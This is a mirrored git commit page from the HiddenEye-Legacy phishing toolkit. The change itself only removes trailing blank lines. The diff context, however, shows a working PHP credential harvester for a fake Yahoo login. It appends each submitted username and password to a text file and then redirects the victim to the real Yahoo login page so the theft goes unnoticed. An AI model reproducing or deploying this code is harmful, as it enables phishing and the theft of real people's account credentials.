mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Removed new lines at the end of file
This commit is contained in:
parent
803b2814bc
commit
fffad2f561
|
@ -4,5 +4,3 @@ include 'base.php';
|
|||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: https://login.yahoo.com');
|
||||
exit();
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue
Block a user